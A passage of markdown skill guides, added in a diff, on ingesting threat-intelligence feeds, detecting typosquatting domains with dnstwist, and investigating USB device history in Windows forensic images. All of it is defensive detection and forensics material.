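A weighted scoring matrix over the four criteria above could look like the following sketch. The weights and the 0 to 5 rating scale are illustrative assumptions, not values taken from NIST SP 800-150, and the feed names are placeholders.

```python
# Hypothetical weights; they sum to 1.0 so scores stay on the rating scale.
WEIGHTS = {
    "update_frequency": 0.20,
    "accuracy": 0.40,
    "sector_coverage": 0.25,
    "attribution_depth": 0.15,
}


def score_feed(ratings, weights=WEIGHTS):
    """Return the weighted score for one feed (ratings on a 0-5 scale)."""
    return round(sum(weights[c] * ratings[c] for c in weights), 2)


feeds = {
    "feed_a": {"update_frequency": 5, "accuracy": 3, "sector_coverage": 2, "attribution_depth": 1},
    "feed_b": {"update_frequency": 3, "accuracy": 5, "sector_coverage": 4, "attribution_depth": 4},
}

# Highest-scoring feeds first
ranked = sorted(feeds, key=lambda name: score_feed(feeds[name]), reverse=True)
print(ranked)
```

Weighting accuracy most heavily reflects one possible priority; a team focused on attribution would shift weight toward `attribution_depth`.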
|
||||
|
||||
### Step 2: Ingest via TAXII 2.1 or API
|
||||
|
||||
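For TAXII-enabled feeds, `taxii2-client` is used as a Python library. A minimal sketch, with the server URL, credentials, and collection ID as placeholders:

```python
from taxii2client.v21 import Server

# Discover API roots and list the collections the account can read
server = Server("https://feed.example.com/taxii/", user="USERNAME", password="PASSWORD")
api_root = server.api_roots[0]
for collection in api_root.collections:
    print(collection.id, collection.title)

# Pull objects added since 2024-01-01 from one collection
collection = next(c for c in api_root.collections if c.id == "<id>")
bundle = collection.get_objects(added_after="2024-01-01T00:00:00Z")
```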
|
||||
|
||||
For REST API feeds (e.g., Recorded Future):
|
||||
- Query `/v2/indicator/search` with `risk_score_min=65` to filter low-confidence IOCs
|
||||
- Apply rate limiting and exponential backoff for API resilience
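
Exponential backoff can be sketched independently of any particular feed API. In this example `request_fn` is a hypothetical callable that performs one API request, and `ConnectionError` stands in for whatever exception the HTTP client raises on a rate-limit or transient failure.

```python
import random
import time


def call_with_backoff(request_fn, max_retries=4, base=1.0, cap=60.0, sleep=time.sleep):
    """Call request_fn, retrying with capped exponential delays plus jitter."""
    for attempt in range(max_retries + 1):
        try:
            return request_fn()
        except ConnectionError:
            if attempt == max_retries:
                raise  # retries exhausted, surface the last error
            delay = min(cap, base * 2 ** attempt)         # 1s, 2s, 4s, ... up to cap
            sleep(delay + random.uniform(0, delay / 10))  # up to 10% jitter
```

Passing `sleep` as a parameter keeps the helper testable without real waiting; the jitter spreads retries from multiple workers so they do not hit the API at the same instant.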
|
||||
|
||||
### Step 3: Normalize to STIX 2.1
|
||||
|
||||
Convert each IOC to STIX 2.1 objects using the OASIS standard schema:
|
||||
- IP address → `indicator` object with `pattern: "[ipv4-addr:value = '...']"`
|
||||
- Domain → `indicator` with `pattern: "[domain-name:value = '...']"`
|
||||
- File hash → `indicator` with `pattern: "[file:hashes.'SHA-256' = '...']"` (hash names containing a hyphen are quoted in STIX patterns)
|
||||
|
||||
Attach `relationship` objects linking indicators to `threat-actor` or `malware` objects. Use `confidence` field (0–100) based on source fidelity rating.
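
The mapping above can be sketched with plain dictionaries, without a STIX library. The function name `to_stix_indicator` and the short IOC type keys (`ipv4`, `domain`, `sha256`) are assumptions for illustration; a production pipeline would more likely use a STIX library that validates objects.

```python
import uuid
from datetime import datetime, timezone

# STIX pattern templates per IOC type (type keys are illustrative)
PATTERNS = {
    "ipv4": "[ipv4-addr:value = '{v}']",
    "domain": "[domain-name:value = '{v}']",
    "sha256": "[file:hashes.'SHA-256' = '{v}']",
}


def to_stix_indicator(ioc_type, value, confidence, now=None):
    """Build a STIX 2.1 indicator as a dict from a single IOC."""
    if not 0 <= confidence <= 100:
        raise ValueError("confidence must be between 0 and 100")
    now = now or datetime.now(timezone.utc)
    ts = now.strftime("%Y-%m-%dT%H:%M:%S.000Z")
    # Escape backslashes and single quotes inside the pattern string literal
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "valid_from": ts,
        "pattern": PATTERNS[ioc_type].format(v=escaped),
        "pattern_type": "stix",
        "confidence": confidence,
    }


indicator = to_stix_indicator("ipv4", "198.51.100.7", confidence=80)
print(indicator["pattern"])
```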
|
||||
|
||||
### Step 4: Deduplicate and Enrich
|
||||
|
||||
Run deduplication against existing TIP database using normalized value + type as composite key. Enrich surviving IOCs:
|
||||
- VirusTotal: detection ratio, sandbox behavior reports
|
||||
- PassiveTotal (RiskIQ): WHOIS history, passive DNS, SSL certificate chains
|
||||
- Shodan: banner data, open ports, geographic location
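
Deduplication on a composite key of type plus normalized value can be sketched as follows. The normalization rules (lowercasing domains and hashes, stripping whitespace and a trailing dot) are assumptions; a real TIP may apply different ones.

```python
def normalize(ioc_type, value):
    """Return the (type, normalized value) composite key for an IOC."""
    value = value.strip()
    if ioc_type in ("domain", "md5", "sha1", "sha256"):
        value = value.lower()      # these types are case-insensitive
    if ioc_type == "domain":
        value = value.rstrip(".")  # drop the trailing root dot
    return (ioc_type, value)


def deduplicate(incoming, existing_keys):
    """Keep only IOCs whose composite key is not already known."""
    seen = set(existing_keys)
    fresh = []
    for ioc in incoming:
        key = normalize(ioc["type"], ioc["value"])
        if key not in seen:
            seen.add(key)
            fresh.append(ioc)
    return fresh


# Hypothetical existing database keys and incoming feed items
existing = {("domain", "evil.example")}
incoming = [
    {"type": "domain", "value": "Evil.Example."},
    {"type": "ipv4", "value": " 198.51.100.7 "},
    {"type": "ipv4", "value": "198.51.100.7"},
]
fresh = deduplicate(incoming, existing)
print(len(fresh))
```

Only the surviving items in `fresh` would then be sent to the enrichment services, which also saves API quota.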
|
||||
|
||||
### Step 5: Distribute to Consuming Systems
|
||||
|
||||
Export enriched indicators via TAXII 2.1 push to SIEM (Splunk, Microsoft Sentinel), firewalls (Palo Alto XSOAR playbooks), and EDR platforms. Set TTL (time-to-live) per indicator type: IP addresses 30 days, domains 90 days, file hashes 1 year.
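
The per-type TTL policy can be expressed as a small lookup. This sketch treats "1 year" as 365 days and uses short type keys that are assumptions for illustration.

```python
from datetime import datetime, timedelta, timezone

# TTL per indicator type, in days (1 year approximated as 365 days)
TTL_DAYS = {"ipv4": 30, "domain": 90, "sha256": 365}


def expires_at(ioc_type, first_seen):
    """Return the timestamp after which the indicator should be retired."""
    return first_seen + timedelta(days=TTL_DAYS[ioc_type])


def is_expired(ioc_type, first_seen, now=None):
    """True if the indicator has outlived its TTL."""
    now = now or datetime.now(timezone.utc)
    return now >= expires_at(ioc_type, first_seen)


seen = datetime(2024, 1, 1, tzinfo=timezone.utc)
print(expires_at("ipv4", seen).date())
```

An export job could call `is_expired` before each push so that stale IP addresses and domains are withdrawn from consuming systems.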
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **STIX 2.1** | Structured Threat Information Expression — OASIS standard JSON schema for CTI objects including indicators, threat actors, campaigns, and relationships |
|
||||
| **TAXII 2.1** | Trusted Automated eXchange of Intelligence Information — HTTPS-based protocol for sharing STIX content between servers and clients |
|
||||
| **IOC** | Indicator of Compromise — observable artifact (IP, domain, hash, URL) that indicates a system may have been breached |
|
||||
| **TLP** | Traffic Light Protocol: color-coded classification defining sharing restrictions for CTI (RED/AMBER/GREEN/CLEAR in TLP 2.0, where CLEAR replaced WHITE and AMBER+STRICT was added) |
|
||||
| **Confidence Score** | Numeric value (0–100 in STIX) reflecting the producer's certainty about an indicator's malicious attribution |
|
||||
| **Feed Fidelity** | Historical accuracy rate of a feed measured by true positive rate in production detections |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **ThreatConnect TC Exchange**: Aggregates 100+ commercial and OSINT feeds; provides automated playbooks for IOC enrichment
|
||||
- **MISP (Malware Information Sharing Platform)**: Open-source TIP supporting STIX/TAXII; widely used by ISACs and government CERTs
|
||||
- **OpenCTI**: Open-source platform with native MITRE ATT&CK integration and graph-based relationship visualization
|
||||
- **Recorded Future**: Commercial feed with AI-powered risk scoring and real-time dark web monitoring
|
||||
- **taxii2-client**: Python library for TAXII 2.0/2.1 client operations (pip install taxii2-client)
|
||||
- **PyMISP**: Python API for MISP feed management and IOC submission
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **IOC age staleness**: IP addresses and domains rotate frequently; applying 1-year-old IOCs generates false positives. Enforce TTL policies.
|
||||
- **Missing context**: Blocking an IOC without understanding the associated campaign or adversary can disrupt legitimate business traffic (e.g., CDN IPs shared with malicious actors).
|
||||
- **Feed overlap without deduplication**: Ingesting the same IOC from five feeds without deduplication inflates indicator counts and SIEM rule complexity.
|
||||
- **TLP violation**: Redistributing RED-classified intelligence outside authorized boundaries violates sharing agreements and trust relationships.
|
||||
- **Over-blocking on low-confidence indicators**: Indicators with confidence below 50 should trigger detection-only rules, not blocking, to avoid operational disruption.
|
||||
@@ -0,0 +1,298 @@
|
||||
---
|
||||
name: analyzing-typosquatting-domains-with-dnstwist
|
||||
description: Detect typosquatting, homograph phishing, and brand impersonation domains using dnstwist to generate domain permutations and identify registered lookalike domains targeting your organization.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [dnstwist, typosquatting, phishing, domain-monitoring, brand-protection, homograph, dns, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Typosquatting Domains with DNSTwist
|
||||
|
||||
## Overview
|
||||
|
||||
DNSTwist is a domain name permutation engine that generates similar-looking domain names to detect typosquatting, homograph phishing attacks, and brand impersonation. It creates thousands of domain permutations using techniques like character substitution, transposition, insertion, omission, and homoglyph replacement, then checks DNS records (A, AAAA, NS, MX), calculates web page similarity using fuzzy hashing (ssdeep) and perceptual hashing (pHash), and identifies potentially malicious registered domains.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `dnstwist` installed (`pip install dnstwist[full]`)
|
||||
- Optional: GeoIP database for IP geolocation
|
||||
- Optional: Shodan API key for enrichment
|
||||
- Network access to perform DNS queries
|
||||
- Understanding of DNS record types and domain registration
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Domain Permutation Techniques
|
||||
|
||||
DNSTwist generates permutations using: addition (appending characters), bitsquatting (bit-flip errors), homoglyph (visually similar Unicode characters like rn vs m), hyphenation (adding hyphens), insertion (inserting characters), omission (removing characters), repetition (repeating characters), replacement (replacing with adjacent keyboard keys), subdomain (inserting dots), transposition (swapping adjacent characters), vowel-swap (swapping vowels), and dictionary-based (appending common words).
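
A few of these techniques are simple string operations. The sketch below reimplements four of them for illustration only; it is not dnstwist's own code, and the function names are chosen here for readability.

```python
def omission(name):
    """Remove one character at each position."""
    return {name[:i] + name[i + 1:] for i in range(len(name))}


def transposition(name):
    """Swap each pair of adjacent, differing characters."""
    return {
        name[:i] + name[i + 1] + name[i] + name[i + 2:]
        for i in range(len(name) - 1)
        if name[i] != name[i + 1]
    }


def repetition(name):
    """Double each character in turn."""
    return {name[:i] + name[i] + name[i:] for i in range(len(name))}


def hyphenation(name):
    """Insert a hyphen between each pair of characters."""
    return {name[:i] + "-" + name[i:] for i in range(1, len(name))}


def permutations(domain):
    """Apply the fuzzers to the first label and keep the rest of the domain."""
    label, _, tld = domain.partition(".")
    variants = set()
    for fuzzer in (omission, transposition, repetition, hyphenation):
        variants |= {f"{v}.{tld}" for v in fuzzer(label) if v and v != label}
    return variants


print(sorted(permutations("example.com"))[:5])
```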
|
||||
|
||||
### Fuzzy Hashing and Visual Similarity
|
||||
|
||||
DNSTwist uses ssdeep (locality-sensitive hash) to compare HTML content and pHash (perceptual hash) to compare screenshots of web pages. This helps identify cloned phishing sites that visually mimic the legitimate site. A high similarity score indicates a likely phishing page.
|
||||
|
||||
### Detection Workflow
|
||||
|
||||
The typical workflow is: generate domain permutations -> resolve DNS records -> check for registered domains -> compare web page similarity -> flag suspicious domains -> alert security team -> request takedown. For a typical corporate domain, dnstwist generates 5,000-10,000 permutations.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Basic Domain Permutation Scan
|
||||
|
||||
```python
import subprocess
import json
from datetime import datetime  # used by the later steps

def run_dnstwist_scan(domain, output_file=None):
    """Run dnstwist scan against a target domain."""
    cmd = [
        "dnstwist",
        "--registered",          # Only show registered domains
        "--format", "json",      # Output in JSON
        "--nameservers", "8.8.8.8,1.1.1.1",
        "--threads", "50",
        "--mxcheck",             # Check MX records
        "--ssdeep",              # Fuzzy hash comparison (newer releases use --lsh ssdeep)
        "--geoip",               # GeoIP lookup
        domain,
    ]

    print(f"[*] Scanning permutations for: {domain}")
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        # dnstwist is not installed or the scan exceeded the timeout
        print(f"[-] dnstwist could not complete: {exc}")
        return []

    if result.returncode != 0:
        print(f"[-] dnstwist error: {result.stderr}")
        return []

    results = json.loads(result.stdout)
    # Keep only permutations that actually resolve
    registered = [r for r in results if r.get("dns_a") or r.get("dns_aaaa")]
    print(f"[+] Found {len(registered)} registered lookalike domains")

    if output_file:
        with open(output_file, "w") as f:
            json.dump(registered, f, indent=2)
        print(f"[+] Results saved to {output_file}")

    return registered

results = run_dnstwist_scan("example.com", "typosquat_results.json")
```
|
||||
|
||||
### Step 2: Analyze and Prioritize Results
|
||||
|
||||
```python
from datetime import datetime

def analyze_results(results, legitimate_ips=None):
    """Analyze dnstwist results and prioritize threats."""
    legitimate_ips = legitimate_ips or set()
    high_risk = []
    medium_risk = []
    low_risk = []

    for entry in results:
        fuzzer = entry.get("fuzzer", "")
        dns_a = entry.get("dns_a", [])
        dns_mx = entry.get("dns_mx", [])
        ssdeep_score = entry.get("ssdeep_score", 0)

        risk_score = 0
        risk_factors = []

        # High similarity to legitimate site
        if ssdeep_score and ssdeep_score > 50:
            risk_score += 40
            risk_factors.append(f"high web similarity ({ssdeep_score}%)")

        # Has MX records (can receive email / phishing)
        if dns_mx:
            risk_score += 20
            risk_factors.append("has MX records (email capable)")

        # Recently registered (only present if the scan collected whois data)
        whois_created = entry.get("whois_created", "")
        if whois_created:
            try:
                created = datetime.fromisoformat(whois_created.replace("Z", "+00:00"))
                age_days = (datetime.now(created.tzinfo) - created).days
                if age_days < 30:
                    risk_score += 30
                    risk_factors.append(f"recently registered ({age_days} days)")
                elif age_days < 90:
                    risk_score += 15
                    risk_factors.append(f"registered {age_days} days ago")
            except (ValueError, TypeError):
                pass  # unparseable date: skip the age factor

        # Homoglyph attacks are highest risk
        if fuzzer == "homoglyph":
            risk_score += 25
            risk_factors.append("homoglyph (visually identical)")
        elif fuzzer in ("addition", "replacement", "transposition"):
            risk_score += 10
            risk_factors.append(f"permutation type: {fuzzer}")

        # Not pointing to legitimate infrastructure
        if dns_a and not set(dns_a).intersection(legitimate_ips):
            risk_score += 10
            risk_factors.append("different IP from legitimate")

        entry["risk_score"] = risk_score
        entry["risk_factors"] = risk_factors

        if risk_score >= 50:
            high_risk.append(entry)
        elif risk_score >= 25:
            medium_risk.append(entry)
        else:
            low_risk.append(entry)

    high_risk.sort(key=lambda x: x["risk_score"], reverse=True)
    medium_risk.sort(key=lambda x: x["risk_score"], reverse=True)

    print("\n=== Typosquatting Analysis ===")
    print(f"High Risk: {len(high_risk)}")
    print(f"Medium Risk: {len(medium_risk)}")
    print(f"Low Risk: {len(low_risk)}")

    if high_risk:
        print("\n--- High Risk Domains ---")
        for entry in high_risk[:10]:
            print(f"  {entry['domain']} (score: {entry['risk_score']})")
            for factor in entry["risk_factors"]:
                print(f"    - {factor}")

    return {"high": high_risk, "medium": medium_risk, "low": low_risk}

analysis = analyze_results(results, legitimate_ips={"93.184.216.34"})
```
|
||||
|
||||
### Step 3: Continuous Monitoring Pipeline
|
||||
|
||||
```python
import json
from datetime import datetime

# Reuses run_dnstwist_scan (Step 1) and analyze_results (Step 2)

class TyposquatMonitor:
    def __init__(self, domains, known_domains_file="known_typosquats.json"):
        self.domains = domains
        self.known_file = known_domains_file
        self.known_domains = self._load_known()

    def _load_known(self):
        # Start with an empty baseline on the first run
        try:
            with open(self.known_file, "r") as f:
                return json.load(f)
        except FileNotFoundError:
            return {}

    def _save_known(self):
        with open(self.known_file, "w") as f:
            json.dump(self.known_domains, f, indent=2)

    def scan_all_domains(self):
        """Scan all monitored domains for new typosquats."""
        new_findings = []
        for domain in self.domains:
            results = run_dnstwist_scan(domain)
            for entry in results:
                domain_key = entry.get("domain", "")
                if domain_key not in self.known_domains:
                    entry["first_seen"] = datetime.now().isoformat()
                    entry["monitored_domain"] = domain
                    self.known_domains[domain_key] = entry
                    new_findings.append(entry)
                    print(f"  [NEW] {domain_key} ({entry.get('fuzzer', '')})")

        self._save_known()
        print(f"\n[+] New typosquatting domains found: {len(new_findings)}")
        return new_findings

    def generate_alert(self, findings):
        """Generate alert for new high-risk typosquatting domains."""
        analysis = analyze_results(findings)
        alerts = []
        for entry in analysis["high"]:
            alerts.append({
                "severity": "HIGH",
                "domain": entry["domain"],
                "target": entry.get("monitored_domain", ""),
                "risk_score": entry["risk_score"],
                "risk_factors": entry["risk_factors"],
                "dns_a": entry.get("dns_a", []),
                "dns_mx": entry.get("dns_mx", []),
                "timestamp": datetime.now().isoformat(),
            })
        return alerts

monitor = TyposquatMonitor(["mycompany.com", "mycompany.org"])
new_findings = monitor.scan_all_domains()
alerts = monitor.generate_alert(new_findings)
```
|
||||
|
||||
### Step 4: Export for Blocklist and Takedown
|
||||
|
||||
```python
from datetime import datetime

def export_blocklist(analysis, output_file="blocklist.txt"):
    """Export high- and medium-risk domains as blocklist for firewall/proxy."""
    # Deduplicate first so the reported count matches the file contents
    domains = sorted({
        entry["domain"]
        for entry in analysis["high"] + analysis["medium"]
        if entry.get("domain")
    })

    with open(output_file, "w") as f:
        f.write(f"# Typosquatting blocklist generated {datetime.now().isoformat()}\n")
        for d in domains:
            f.write(f"{d}\n")

    print(f"[+] Blocklist saved: {len(domains)} domains -> {output_file}")
    return domains

def generate_takedown_report(high_risk_domains):
    """Generate takedown request report."""
    lines = [
        "# Domain Takedown Request",
        f"Generated: {datetime.now().isoformat()}",
        "",
        "## Summary",
        f"{len(high_risk_domains)} domains identified as potential typosquatting/phishing.",
        "",
        "## Domains Requiring Takedown",
    ]
    for entry in high_risk_domains:
        # Fall back to N/A when a record list is missing or empty
        lines += [
            "",
            f"### {entry['domain']}",
            f"- **Permutation Type**: {entry.get('fuzzer', 'unknown')}",
            f"- **IP Address**: {', '.join(entry.get('dns_a') or ['N/A'])}",
            f"- **MX Records**: {', '.join(entry.get('dns_mx') or ['N/A'])}",
            f"- **Risk Score**: {entry.get('risk_score', 0)}",
            f"- **Risk Factors**: {'; '.join(entry.get('risk_factors', []))}",
            f"- **Web Similarity**: {entry.get('ssdeep_score', 'N/A')}%",
        ]

    with open("takedown_report.md", "w") as f:
        f.write("\n".join(lines) + "\n")
    print("[+] Takedown report generated: takedown_report.md")

export_blocklist(analysis)
generate_takedown_report(analysis["high"])
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- DNSTwist generates domain permutations for target domain
|
||||
- DNS resolution identifies registered lookalike domains
|
||||
- Web similarity scoring detects cloned phishing pages
|
||||
- Risk scoring prioritizes domains by threat level
|
||||
- Continuous monitoring detects newly registered typosquats
|
||||
- Blocklist and takedown reports generated correctly
|
||||
|
||||
## References
|
||||
|
||||
- [dnstwist GitHub Repository](https://github.com/elceef/dnstwist)
|
||||
- [dnstwister Online Service](https://dnstwister.report/)
|
||||
- [HawkEye: Detect Typosquatting with DNSTwist](https://hawk-eye.io/2022/11/how-to-detect-typosquatting-using-dnstwist/)
|
||||
- [Darktrace: Monitoring Typosquatting Domains](https://www.darktrace.com/blog/vigilance-in-action-monitoring-typosquatting-domains)
|
||||
- [Security Risk Advisors: Domain Monitoring](https://sra.io/blog/domain-monitoring-fast-and-cheap/)
|
||||
- [Conscia: How to Detect Typosquatting](https://conscia.com/blog/diving-deep-how-to-detect-typosquatting/)
|
||||
@@ -0,0 +1,352 @@
|
||||
---
|
||||
name: analyzing-usb-device-connection-history
|
||||
description: Investigate USB device connection history from Windows registry, event logs, and setupapi logs to track removable media usage and potential data exfiltration.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, usb-forensics, removable-media, registry-analysis, data-exfiltration, device-history]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing USB Device Connection History
|
||||
|
||||
## When to Use
|
||||
- When investigating potential data exfiltration via removable storage devices
|
||||
- During insider threat investigations to track USB device usage
|
||||
- For compliance audits verifying removable media policy enforcement
|
||||
- When correlating USB connections with file access and copy events
|
||||
- For establishing a timeline of device connections during an incident
|
||||
|
||||
## Prerequisites
|
||||
- Forensic image or extracted registry hives and event logs
|
||||
- Access to SYSTEM, SOFTWARE, and NTUSER.DAT registry hives
|
||||
- SetupAPI logs (setupapi.dev.log)
|
||||
- Windows Event Logs (System, Security, DriverFrameworks-UserMode)
|
||||
- USBDeview, USB Forensic Tracker, or RegRipper
|
||||
- Understanding of USB device identification (VID, PID, serial number)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract USB-Related Artifacts
|
||||
|
||||
```bash
|
||||
# Mount forensic image and copy relevant artifacts
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
mkdir -p /cases/case-2024-001/usb/ /cases/case-2024-001/analysis/
|
||||
|
||||
# Registry hives
|
||||
cp /mnt/evidence/Windows/System32/config/SYSTEM /cases/case-2024-001/usb/
|
||||
cp /mnt/evidence/Windows/System32/config/SOFTWARE /cases/case-2024-001/usb/
|
||||
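for hive in /mnt/evidence/Users/*/NTUSER.DAT; do cp "$hive" "/cases/case-2024-001/usb/NTUSER_$(basename "$(dirname "$hive")").DAT"; done  # one hive per user, no overwrites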
|
||||
|
||||
# SetupAPI logs (first connection timestamps)
|
||||
cp /mnt/evidence/Windows/INF/setupapi.dev.log /cases/case-2024-001/usb/
|
||||
|
||||
# Event logs
|
||||
cp /mnt/evidence/Windows/System32/winevt/Logs/System.evtx /cases/case-2024-001/usb/
|
||||
cp "/mnt/evidence/Windows/System32/winevt/Logs/Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx" \
|
||||
/cases/case-2024-001/usb/ 2>/dev/null
|
||||
cp "/mnt/evidence/Windows/System32/winevt/Logs/Microsoft-Windows-Partition%4Diagnostic.evtx" \
|
||||
/cases/case-2024-001/usb/ 2>/dev/null
|
||||
```
|
||||
|
||||
### Step 2: Parse USBSTOR Registry Key
|
||||
|
||||
```bash
# Extract USBSTOR entries from SYSTEM hive
python3 << 'PYEOF'
from Registry import Registry
import json

reg = Registry.Registry("/cases/case-2024-001/usb/SYSTEM")

# Find current ControlSet
select = reg.open("Select")
current = select.value("Current").value()
controlset = f"ControlSet{current:03d}"

# Parse USBSTOR
usbstor_path = f"{controlset}\\Enum\\USBSTOR"
usbstor = reg.open(usbstor_path)

devices = []
print("=== USBSTOR DEVICES ===\n")

for device_class in usbstor.subkeys():
    # Format: Disk&Ven_VENDOR&Prod_PRODUCT&Rev_REVISION
    class_name = device_class.name()
    parts = class_name.split('&')
    vendor = parts[1].replace('Ven_', '') if len(parts) > 1 else 'Unknown'
    product = parts[2].replace('Prod_', '') if len(parts) > 2 else 'Unknown'
    revision = parts[3].replace('Rev_', '') if len(parts) > 3 else 'Unknown'

    for instance in device_class.subkeys():
        serial = instance.name()
        # Key last-write time; treated here as an approximation of the last connection
        last_write = instance.timestamp()

        device_info = {
            'vendor': vendor,
            'product': product,
            'revision': revision,
            'serial': serial,
            'last_connected': str(last_write),
        }

        # Optional values stored on the instance key itself
        for value_name, field in (("FriendlyName", "friendly_name"), ("ClassGUID", "class_guid")):
            try:
                device_info[field] = instance.value(value_name).value()
            except Registry.RegistryValueNotFoundException:
                pass

        devices.append(device_info)
        print(f"Device: {vendor} {product}")
        print(f"  Serial: {serial}")
        print(f"  Last Connected: {last_write}")
        print(f"  Friendly Name: {device_info.get('friendly_name', 'N/A')}")
        print()

# Save results
with open('/cases/case-2024-001/analysis/usb_devices.json', 'w') as f:
    json.dump(devices, f, indent=2)

print(f"\nTotal USB storage devices found: {len(devices)}")
PYEOF
```
|
||||
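The key-name parsing in Step 2 can be isolated into small helpers that are easier to test. The sketch below is illustrative only: `parse_usbstor_class` and `split_instance_id` are hypothetical names, and the rule that an instance ID whose second character is `&` was generated by Windows (because the device reported no unique serial) is a commonly cited forensic heuristic that should be confirmed on the system under examination.

```python
def parse_usbstor_class(class_name: str) -> dict:
    """Split a USBSTOR class key name such as Disk&Ven_X&Prod_Y&Rev_Z."""
    fields = {'type': 'Unknown', 'vendor': 'Unknown',
              'product': 'Unknown', 'revision': 'Unknown'}
    prefixes = {'Ven_': 'vendor', 'Prod_': 'product', 'Rev_': 'revision'}
    parts = class_name.split('&')
    if parts and parts[0]:
        fields['type'] = parts[0]
    # Match on the prefix rather than position, so a missing field
    # does not shift the remaining ones
    for part in parts[1:]:
        for prefix, key in prefixes.items():
            if part.startswith(prefix):
                fields[key] = part[len(prefix):] or 'Unknown'
    return fields


def split_instance_id(instance_id: str) -> tuple:
    """Return (serial, os_generated) for a USBSTOR instance key name."""
    # Heuristic (assumption): '&' as the second character marks an ID
    # generated by Windows rather than reported by the device
    os_generated = len(instance_id) > 1 and instance_id[1] == '&'
    if os_generated:
        return instance_id, True
    # Drop the trailing '&<n>' suffix that follows the device serial
    return instance_id.rsplit('&', 1)[0], False


if __name__ == '__main__':
    print(parse_usbstor_class('Disk&Ven_Kingston&Prod_DataTraveler_3.0&Rev_PMAP'))
    print(split_instance_id('0019E06B4521A2B0&0'))
```

Matching on the `Ven_`/`Prod_`/`Rev_` prefixes instead of list positions keeps the parser stable when a vendor omits one of the fields.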
|
||||
### Step 3: Extract Drive Letter Assignments and User Associations
|
||||
|
||||
```bash
# Parse MountedDevices from SYSTEM hive
python3 << 'PYEOF'
from Registry import Registry
import struct

reg = Registry.Registry("/cases/case-2024-001/usb/SYSTEM")

mounted = reg.open("MountedDevices")

print("=== MOUNTED DEVICES (Drive Letter Assignments) ===\n")
for value in mounted.values():
    name = value.name()
    data = value.value()

    if not name.startswith("\\DosDevices\\"):
        continue
    drive_letter = name.replace("\\DosDevices\\", "")

    if len(data) == 12:
        # MBR disk: 4-byte disk signature + 8-byte partition offset
        disk_sig, offset = struct.unpack('<IQ', data)
        print(f"  {drive_letter} -> Disk Signature: 0x{disk_sig:08X}, Offset: {offset}")
    elif len(data) > 24:
        # Removable/USB device: UTF-16LE device path string
        try:
            device_path = data.decode('utf-16-le').strip('\x00')
        except UnicodeDecodeError:
            continue
        if 'USBSTOR' in device_path or 'USB#' in device_path:
            print(f"  {drive_letter} -> {device_path}")
    else:
        # Other layouts (for example 24-byte GPT identifiers) are reported, not decoded
        print(f"  {drive_letter} -> {len(data)}-byte identifier (not decoded)")
PYEOF

# Parse user MountPoints2 (which user accessed which devices)
python3 << 'PYEOF'
from Registry import Registry
import os, glob

print("\n=== USER MOUNT POINTS (MountPoints2) ===\n")

for ntuser in glob.glob("/cases/case-2024-001/usb/NTUSER*.DAT"):
    try:
        reg = Registry.Registry(ntuser)
        mp2 = reg.open("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2")

        print(f"User hive: {os.path.basename(ntuser)}")
        for key in mp2.subkeys():
            guid = key.name()
            last_write = key.timestamp()
            if '{' in guid:
                print(f"  Volume: {guid} | Last accessed: {last_write}")
        print()
    except Exception as e:
        print(f"  Error parsing {ntuser}: {e}")
PYEOF
```
|
||||
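MountedDevices values come in several binary layouts, so it helps to classify a value before decoding it. The following is a minimal sketch, not a complete parser: `describe_mounted_device` is a hypothetical helper, and the 24-byte `DMIO:ID:` layout for GPT partitions (prefix followed by a 16-byte partition GUID) is stated here as an assumption to verify against the hive being examined.

```python
import struct
import uuid


def describe_mounted_device(data: bytes) -> dict:
    """Classify one MountedDevices value by its binary layout."""
    if len(data) == 12:
        # MBR: 4-byte disk signature followed by 8-byte partition offset
        sig, offset = struct.unpack('<IQ', data)
        return {'kind': 'mbr', 'disk_signature': f'0x{sig:08X}',
                'partition_offset': offset}
    if len(data) == 24 and data[:8] == b'DMIO:ID:':
        # Assumed GPT layout: prefix + partition GUID in little-endian form
        return {'kind': 'gpt',
                'partition_guid': str(uuid.UUID(bytes_le=data[8:]))}
    try:
        path = data.decode('utf-16-le').rstrip('\x00')
    except UnicodeDecodeError:
        return {'kind': 'unknown', 'raw': data.hex()}
    is_usb = 'USBSTOR' in path.upper() or 'USB#' in path.upper()
    return {'kind': 'usb' if is_usb else 'device_path', 'device_path': path}


if __name__ == '__main__':
    # Synthetic MBR value: signature 0x12345678, partition at 1 MiB
    print(describe_mounted_device(struct.pack('<IQ', 0x12345678, 1048576)))
```

Returning a dictionary with a `kind` field lets the caller decide which entries to correlate with USBSTOR serial numbers and which to report as fixed disks.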
|
||||
### Step 4: Extract First Connection Timestamps from SetupAPI
|
||||
|
||||
```bash
# Parse setupapi.dev.log for USB device first-install timestamps
python3 << 'PYEOF'
import re

print("=== SETUPAPI USB DEVICE INSTALLATIONS ===\n")

with open('/cases/case-2024-001/usb/setupapi.dev.log', 'r', errors='ignore') as f:
    content = f.read()

# Find USB device installation sections
pattern = r'>>>\s+\[Device Install.*?\n.*?Section start (\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}).*?\n(.*?)<<<'
matches = re.findall(pattern, content, re.DOTALL)

usb_installs = []
for timestamp, section in matches:
    if 'USBSTOR' in section or 'USB\\VID' in section:
        # Extract device ID
